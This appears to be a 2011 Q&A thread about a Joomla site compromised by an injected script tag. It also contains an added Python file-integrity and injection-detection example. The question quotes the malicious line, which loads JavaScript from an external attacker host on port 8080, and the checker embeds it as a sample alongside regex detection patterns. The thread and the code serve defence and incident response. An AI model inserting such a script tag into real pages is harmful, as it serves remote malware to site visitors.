Tuesday, January 25, 2011

kollinsoy.skyefenton.com attack?

Recently my website was attacked by malware. It turned my index page blank. The attack added 2 lines to my index.php:

<script type="text/javascript" src="http://kollinsoy.skyefenton.com:8080/Data_Type.js"></script>
<!--6aa6b5f1b4e70b5a72df7793c2b6e64b-->

I'm using Joomla 1.5.11 on a server that is considered secure. How did it happen, and how can I prevent it in the future?

  • 1) latest updates.

    2) run IDS, and keep checksums of files that aren't supposed to be changing.

    3) consider putting in a system for versioning files that aren't supposed to be changing.

    4) don't run software that isn't necessary.

    5) isolate processes and services as much as possible and run with reduced privileges to the lowest level possible.

    6) subscribe to security and user mailing lists for software you use, like Joomla groups and software you're using for your servers.

    7) backup backup backup

    8) format and reinstall your server from known-good source. You don't know how far the compromise goes back or what rootkits or other issues have been introduced.

    9) install monitoring software on systems for your switches, routers, firewall...get to know "normal" traffic patterns from anomalies, then investigate when something starts looking weird.

    10) stay familiar with your business's servers and workflow. Familiar enough that you can just "Feel" when something isn't right with the servers. Investigate. Check logs.

    11) configure remote logging to a secured server. Compromised systems easily cover their tracks when the logs are local.

    12) pick up some books on system security or delegate someone to be in charge of updates, security issues, etc.

    13) isolate Internet-facing systems from your internal development, backup, etc. systems. Backups are no good if your internal systems are monitored by loggers and sniffers.

    14) keep researching server security with books and articles online, since this site cannot possibly cover everything you should know if you want to protect your business (and your customers) on a topic like that.

    Chris S : +1 "7) **backup backup backup**"
    Bart Silverstrim : I should have said that the backup should be more than a basic file backup but rather able to re-install from bare metal, and goes far enough back that you can reinstall pre-compromise.
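An added example, not written by anyone in this thread, of item 2 above (keeping checksums of files that aren't supposed to change) combined with a line-level check for the kind of appended external script the question describes. It assumes Python 3; the web root, its file contents and the dropped "unexpected.php" file are constructed for the demo, and the two injected lines are the ones quoted in the question.

```python
"""Baseline-and-verify file integrity check for a web root, plus a heuristic
scan for the appended <script> injection described in the thread."""
import hashlib
import re
import tempfile
from pathlib import Path

# Constructed sample: the two lines the question reports were appended to index.php.
INJECTED_LINES = (
    '<script type="text/javascript" '
    'src="http://kollinsoy.skyefenton.com:8080/Data_Type.js"></script>\n'
    '<!--6aa6b5f1b4e70b5a72df7793c2b6e64b-->\n'
)

# Heuristics for this injection: a <script> loaded from an external host on an
# explicit non-default port, and a bare 32-hex-digit HTML comment marker.
EXTERNAL_SCRIPT_RE = re.compile(
    r'<script[^>]*src=["\']https?://[^"\']+:\d+/[^"\']*["\']', re.IGNORECASE)
HEX_MARKER_RE = re.compile(r'<!--[0-9a-f]{32}-->')

# File types that should only change during a deliberate deployment.
WATCHED_SUFFIXES = {".php", ".html", ".htm", ".js"}


def sha256_file(path: Path) -> str:
    """Return the hex SHA-256 digest of a file, read in chunks."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path) -> dict:
    """Map every watched file under root (relative POSIX path) to its digest.
    In practice the baseline is stored off the web server, read-only or signed."""
    return {
        p.relative_to(root).as_posix(): sha256_file(p)
        for p in sorted(root.rglob("*"))
        if p.is_file() and p.suffix in WATCHED_SUFFIXES
    }


def verify(root: Path, baseline: dict) -> dict:
    """Compare the current tree with the baseline.
    Returns sorted lists of modified, added and removed relative paths."""
    current = build_baseline(root)
    return {
        "modified": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def find_injected_lines(path: Path) -> list:
    """Return (line_number, line) pairs that match the injection heuristics."""
    hits = []
    with path.open("r", encoding="utf-8", errors="replace") as f:
        for n, line in enumerate(f, start=1):
            if EXTERNAL_SCRIPT_RE.search(line) or HEX_MARKER_RE.search(line):
                hits.append((n, line.rstrip("\n")))
    return hits


def demo() -> tuple:
    """Build a constructed web root, baseline it, simulate the compromise, verify."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.php").write_text("<?php echo 'hello'; ?>\n")
        (root / "templates").mkdir()
        (root / "templates" / "index.php").write_text("<?php defined('_JEXEC') or die; ?>\n")
        (root / "images").mkdir()
        (root / "images" / "logo.png").write_bytes(b"\x89PNG")  # not a watched type
        baseline = build_baseline(root)

        # Simulate what the thread describes: lines appended to index.php,
        # plus an unexpected new PHP file appearing in the web root.
        with (root / "index.php").open("a") as f:
            f.write(INJECTED_LINES)
        (root / "unexpected.php").write_text("<?php /* not part of the site */ ?>\n")

        report = verify(root, baseline)
        flagged = {p: find_injected_lines(root / p) for p in report["modified"]}
        return report, flagged


if __name__ == "__main__":
    report, flagged = demo()
    print(report)
    for path, hits in flagged.items():
        for n, line in hits:
            print(f"{path}:{n}: {line}")
```

Run it on a real install by pointing `build_baseline` at the web root right after a clean deployment, saving the result somewhere the web server account cannot write, and running `verify` from cron; any entry in "modified" or "added" that did not come from your own deployment is the cue to pull the server offline and go to items 7 and 8 above.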
  • That exploit typically takes place through a leaked FTP username/password.

    From karmawhore
  • This is a common attack using stolen FTP credentials. So even if your Joomla install is secure, you need to use good passwords.

    First thing to do now is change your passwords asap.

    Details of this malware:

    http://blog.sucuri.net/2010/06/web-sites-hacked-with-malware-from-iopap-upperdarby26-com.html

    http://sucuri.net/malware/entry/MW:IOPAP:1

    Ivan Slaughter : Thanks sucuri, really helps my site survive.
    From sucuri
